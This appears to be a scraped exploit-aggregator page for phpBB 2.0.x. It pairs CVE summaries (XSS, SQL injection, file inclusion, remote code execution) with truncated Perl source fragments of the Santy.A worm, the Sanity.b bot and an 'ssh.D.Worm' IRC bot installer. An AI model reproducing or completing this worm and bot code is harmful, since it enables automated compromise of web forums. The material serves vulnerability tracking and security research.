phpBB 2.0.10 - 'ssh.D.Worm' Bot Install Altavista

!/usr/bin/perl ------------------------------------------------------------------------ Severino Honorato - /server irc.priv8crew.info Priv8crew - ssh.D.Worm use IO::Socket; use LWP::Simple; my $processo = "/usr/local/apache/bin/httpd -DSSL"; $SIG"INT" = "IGNORE"; $SIG"HUP" = "IGNORE"; $SIG"TERM"...

phpBB <= 2.0.10 Bot Install (Altavista) (ssh.D.Worm)

No description provided by source. !/usr/bin/perl ------------------------------------------------------------------------ Severino Honorato - /server irc.priv8crew.info Priv8crew - ssh.D.Worm use IO::Socket; use LWP::Simple; my $processo = "/usr/local/apache/bin/httpd -DSSL"; $SIG"INT" = "IGNORE...

phpBB <= 2.0.10 Bot Install (Altavista) (ssh.D.Worm)

Exploit for unknown platform in category web applications ==================================================== phpBB / $ae= s//$1/; $uber=$1; $uber = s/ //g; $uber = s///g; $uber = s///g; $uber = s/wb...

CVE-2004-2358

Cross-site scripting XSS vulnerability in adminwords.php for phpBB 2.0.6c allows remote attackers to inject arbitrary web script or HTML via the id parameter...

CVE-2004-2350

SQL injection vulnerability in search.php for phpBB 1.0 through 2.0.6 allows remote attackers to execute arbitrary SQL and gain privileges via the searchresults parameter...

CVE-2004-1399

Directory traversal vulnerability in the Attachment module 2.3.10 and earlier for phpBB allows remote attackers to read arbitrary files via a .. dot dot in the filename...

CVE-2004-1404

Attachment Mod 2.3.10 module for phpBB, when used with Apache modmime, does not properly handle files with multiple file extensions, such as .php.rar, which allows remote attackers to upload and execute arbitrary code...

CVE-2004-1535

PHP remote file inclusion vulnerability in admincash.php for the Cash Mod module for phpBB allows remote attackers to execute arbitrary PHP code by modifying the phpbbrootpath parameter to reference a URL on a remote web server that contains the code...

CVE-2004-1315

viewtopic.php in phpBB 2.x before 2.0.11 improperly URL decodes the highlight parameter when extracting words and phrases to highlight, which allows remote attackers to execute arbitrary PHP code by double-encoding the highlight value so that special characters are inserted into the result, which...

CVE-2004-1315

Summary: CVE-2004-1315 affects phpBB 2.x prior to 2.0.11. The vulnerability stems from improper URL decoding of the highlight parameter in viewtopic.php, allowing a remote attacker to double-encode the highlight value so that PHP exec runs arbitrary code. Exploited in the wild by the Santy.A worm...

CVE-2004-2054

CRLF injection vulnerability in PhpBB 2.0.4 and 2.0.9 allows remote attackers to perform HTTP Response Splitting attacks to modify expected HTML content from the server via 1 the mode parameter to privmsg.php or 2 the redirect parameter to login.php...

CVE-2004-1809

Cross-site scripting XSS vulnerability in phpBB 2.0.6d and earlier allows remote attackers to inject arbitrary web script or HTML via the 1 postdays parameter to viewtopic.php or 2 topicdays parameter to viewforum.php...

Sanity.b - phpBB &lt;= 2.0.10 Bot Install (AOL/Yahoo Search)

No description provided by source. /usr/bin/perl use IO::Socket; use LWP::Simple; @vul = ""; $a=0; $numero = int rand999; $site = "search.aol.com"; $procura = "viewtopic.php%3Ft%3D$numero"; for$n=0;$n90;$n += 10 $sock = IO::Socket::INET-newPeerAddr="$site",PeerPort="80",Proto="tcp" or next; print...

Sanity.b - phpBB <= 2.0.10 Bot Install (AOL/Yahoo Search)

Exploit for unknown platform in category web applications ========================================================= Sanity.b - phpBB newPeerAddr="$site",PeerPort="80",Proto="tcp" or next; print $sock "GET /aolcom/search?q=$procura&Stage=0&page=$n HTTP/1.0\n\n"; @resu = ; close$sock; $ae = "@resu"...

CVE-2004-2130

Multiple cross-site scripting XSS vulnerabilities in privmsg.php in phpBB 2.0.6 allow remote attackers to execute arbitrary script or HTML via the 1 folder or 2 mode variables...

phpBB &lt; 2.0.10 - &#039;Santy.A Worm&#039; &#039;highlight&#039; Arbitrary File Upload

Santy.A - phpBB 3; open IN, $0 or exit; my $self = join '', ; close IN; unlink $0; while!GrabURL'http://www.google.com/advancedsearch' if$generation 3 PayLoad ; else exit; $self = s/my $generation = \d+;/'my $generation = ' . $1 + 1 . ';'/e; my $selfFileName = 'm1ho2of'; my $markStr =...

phpBB highlight Arbitrary File Upload (Santy.A)

Exploit for unknown platform in category web applications =============================================== phpBB highlight Arbitrary File Upload Santy.A =============================================== Santy.A - phpBB 3; open IN, $0 or exit; my $self = join '', ; close IN; unlink $0;...

phpBB 2.0.10 - Santy.A Worm highlight Arbitrary File Upload

phpBB 2.0.10 - Santy.A Worm highlight Arbitrary File Upload Santy.A - phpBB 3; open IN, $0 or exit; my $self = join '', ; close IN; unlink $0; while!GrabURL'http://www.google.com/advancedsearch' if$generation 3 PayLoad ; else exit; $self = s/my $generation = \d+;/'my $generation = ' . $1 + 1...

phpBB highlight Arbitrary File Upload (Santy.A)

No description provided by source. Santy.A - phpBB = 2.0.10 Web Worm Source Code Proof of Concept -SECU For educational purpose See : http://isc.sans.org/diary.php?date=2004-12-21 http://www.f-secure.com/v-descs/santya.shtml !/usr/bin/perl use strict; use Socket; sub PayLoad; sub DoDir$; sub DoFi...

phpBB viewtopic.php fails to properly sanitize input passed to the "highlight" parameter

Overview phpBB contains an user input validation problem with regard to the parsing of the URL. An intruder can deface a phpBB website, execute arbitrary commands, or gain administrative privileges on a compromised bulletin board. Description phpBB is an open-source bulletin board. A lack of inpu...